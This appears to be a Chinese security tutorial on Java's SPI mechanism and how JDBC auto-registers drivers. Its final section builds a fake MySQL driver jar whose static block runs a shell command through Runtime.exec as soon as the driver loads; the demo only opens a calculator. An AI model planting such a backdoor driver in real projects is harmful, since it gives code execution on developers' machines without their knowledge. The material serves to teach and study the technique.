0x01 What Is SPI
Service Provider Interface:是JDK内置的一种服务提供发现机制,是Java提供的一套用来被第三方实现或扩展的接口,它可以用来启动框架扩展和替换组件。SPI是为这些被扩展的API寻找服务实现。不同厂商可以针对同一接口做出不同的实现。
API:实现方制定接口并完成对接口的实现,调用方仅仅依赖接口调用,无权选择不同实现。API被应用开发人员使用
SPI:应用方制定接口规范,提供给外部来实现,调用方在调用时则选择自己需要的外部实现。SPI被框架扩展人员使用
如java.sql.Driver
接口
0x02 Best Practice
接口:
package com.demo.spi;
public interface SpiService {
public void say();
}
实现类:
package com.demo.spi;
public class SPI_1 implements SpiService{
@Override
public void say() {
System.out.println("SPI_1 at your service");
}
}
package com.demo.spi;
public class SPI_2 implements SpiService{
@Override
public void say() {
System.out.println("SPI_2 at your service");
}
}
在classpath下面创建目录META-INF/services/
,创建一个名字为上面接口全限定名的文件
测试:
package com.demo.spi;
import java.util.ServiceLoader;
public class SpiTest {
public static void main(String[] args) {
ServiceLoader<SpiService> serviceLoader = ServiceLoader.load(SpiService.class);
for (SpiService spiService : serviceLoader) {
spiService.say();
}
}
}
0x03 SPI + JDBC
<dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<version>8.0.27</version>
</dependency>
JDBC连接数据库经常是下面的写法,首先是注册驱动,告诉程序使用哪种数据库
// 注册驱动
Class.forName("com.mysql.cj.jdbc.Driver");
// 获取连接对象
Connection con = DriverManager.getConnection("jdbc:mysql://localhost:3306/test","root", "root");
驱动jar包下的META-INF/services
文件夹中的java.sql.Driver
文件(文件名为SPI接口)中已经把Driver类路径记录下来了
若程序中没有注册驱动,会先读取这个文件,自动注册驱动。
这里就用到了SPI技术,它通过在ClassPath路径下的META-INF/services文件夹查找文件,实现类自动加载
Java类加载过程中,有一步是初始化(Initialization),初始化阶段会执行被加载类的Static Blocks。
注册驱动时执行了Class.forName("com.mysql.cj.jdbc.Driver")
,Class.forName()
默认会进行类的初始化
@CallerSensitive
public static Class<?> forName(String className) throws ClassNotFoundException {
Class<?> caller = Reflection.getCallerClass();
// 第二个参数为initialized,表示是否进行初始化
// 第三个参数为类加载器,默认使用调用者的ClassLoader
return forName0(className, true, ClassLoader.getClassLoader(caller), caller);
}
com.mysql.cj.jdbc.Driver
的静态代码中调用了DriverManager
的registerDriver
静态方法
package com.mysql.cj.jdbc;
import java.sql.DriverManager;
import java.sql.SQLException;
public class Driver extends NonRegisteringDriver implements java.sql.Driver {
public Driver() throws SQLException {
}
static {
try {
// 使用DriverManager类的registerDriver静态方法来注册驱动
DriverManager.registerDriver(new Driver());
} catch (SQLException var1) {
throw new RuntimeException("Can't register driver!");
}
}
}
因此JVM会尝试去加载DriverManager
类,进而执行DriverManager
的静态代码,调用类中的loadInitialDrivers
方法
static {
loadInitialDrivers();
println("JDBC DriverManager initialized");
}
private static void loadInitialDrivers() {
String drivers;
try {
drivers = AccessController.doPrivileged(new PrivilegedAction<String>() {
public String run() {
return System.getProperty("jdbc.drivers"); // 也可以通过设置系统属性来加载驱动
}
});
} //...
AccessController.doPrivileged(new PrivilegedAction<Void>() {
public Void run() {
ServiceLoader<Driver> loadedDrivers = ServiceLoader.load(Driver.class);
Iterator<Driver> driversIterator = loadedDrivers.iterator();
try{
while(driversIterator.hasNext()) {
driversIterator.next();
}
}
// ....
String[] driversList = drivers.split(":");
for (String aDriver : driversList) {
try {
Class.forName(aDriver, true,
ClassLoader.getSystemClassLoader());
} // ...
}
}
注意到ServiceLoader.load(Driver.class)
进行了类加载
public static <S> ServiceLoader<S> load(Class<S> service) {
ClassLoader cl = Thread.currentThread().getContextClassLoader();
return ServiceLoader.load(service, cl);
}
最后得到的driversIterator
就是LazyIterator
懒迭代器,顾名思义,需要用的时候才迭代
hasNext => hasNextService
ServiceLoader<S>
类有常量属性PREFIX = "META-INF/services/"
service.getName()
获取接口全类名,拼接得到SPI文件名,读取得到实现类的类名
调用其next方法 => nextService方法
private S nextService() {
if (!hasNextService())
throw new NoSuchElementException();
String cn = nextName;
nextName = null;
Class<?> c = null;
try {
c = Class.forName(cn, false, loader);
//...
}
Thread.currentThread().getContextClassLoader();
获取类加载器
扩展的实现类通过c = Class.forName(cn, false, loader);
获取
Class.forName()
默认使用调用者的ClassLoader,我们是在DriverManager
类里调用ServiceLoader的,所以调用类也就是DriverManager
,它的加载器是Bootstrap ClassLoader
。我们知道Bootstrap ClassLoader
加载rt.jar包下的所有类,要用Bootstrap ClassLoader
去加载用户自定义的类是违背双亲委派的,所以使用Thread.currentThread().getContextClassLoader
去指定AppClassLoader
(ServiceLoader.load
传入的)
查看ClassPath下有那些JDBC Driver
import java.sql.Driver;
import java.util.Iterator;
import java.util.ServiceLoader;
public class JdbcDriverList {
public static void main(String[] args) {
ServiceLoader<Driver> serviceLoader = ServiceLoader.load(Driver.class, ClassLoader.getSystemClassLoader());
for (Iterator<Driver> iterator = serviceLoader.iterator(); iterator.hasNext();) {
Driver driver = iterator.next();
System.out.println(driver.getClass().getPackage() + " ------> " + driver.getClass().getName());
}
}
}
0x04 JDBC Driver后门
现在我们尝试自己编写一个后门驱动jar包,让用户引入后门jar包,在建立JDBC连接时,触发执行命令
jar cvf ShellDriver.jar ShellDriver.class
jar中的META-INF下需要有services文件夹
services文件夹下为java.sql.Driver,内容为com.mysql.fake.jdbc.ShellDriver
这是为了让SPI找到我们要加载的类ShellDriver
package com.mysql.fake.jdbc;
import java.sql.*;
import java.util.Properties;
import java.util.logging.Logger;
public class ShellDriver implements java.sql.Driver {
protected static final String WindowsCmd = "calc";
protected static final String LinuxCmd = "open -a calculator";
protected static String shell;
protected static String args;
protected static String cmd;
static {
if( System.getProperty("os.name").toLowerCase().contains("windows") ){
shell = "cmd.exe";
args = "/c";
cmd = WindowsCmd;
} else {
shell = "/bin/sh";
args = "-c";
cmd = LinuxCmd;
}
try{
Runtime.getRuntime().exec(new String[] {shell, args, cmd});
} catch(Exception ignored) {
}
}
@Override
public Connection connect(String url, Properties info) throws SQLException {
return null;
}
@Override
public boolean acceptsURL(String url) throws SQLException {
return false;
}
@Override
public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) throws SQLException {
return new DriverPropertyInfo[0];
}
@Override
public int getMajorVersion() {
return 0;
}
@Override
public int getMinorVersion() {
return 0;
}
@Override
public boolean jdbcCompliant() {
return false;
}
@Override
public Logger getParentLogger() throws SQLFeatureNotSupportedException {
return null;
}
}
执行JDBC连接数据库操作,成功弹出计算器
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;
public class Jdbc_Demo {
public static void main(String[] args) throws Exception {
// 注册驱动
Class.forName("com.mysql.cj.jdbc.Driver");
// 获取数据库连接对象
Connection con = DriverManager.getConnection("jdbc:mysql://localhost:3308/test","root", "123456");
// 定义sql语句
String sql = "select * from flag";
// 获取执行sql的对象Statement
Statement stmt = con.createStatement();
// 执行sql
ResultSet res = stmt.executeQuery(sql);
// 处理对象
while(res.next()) {
System.out.println(res.getString("flag"));
}
// 释放资源
res.close();
stmt.close();
con.close();
}
}
注意:Class.forName(className, initia, currentLoader)
第二个参数指定是否初始化,nextService中第二个参数为false。因此不会执行待加载类的静态代码。实际上是后面对加载的Class进行newInstance时才执行了静态代码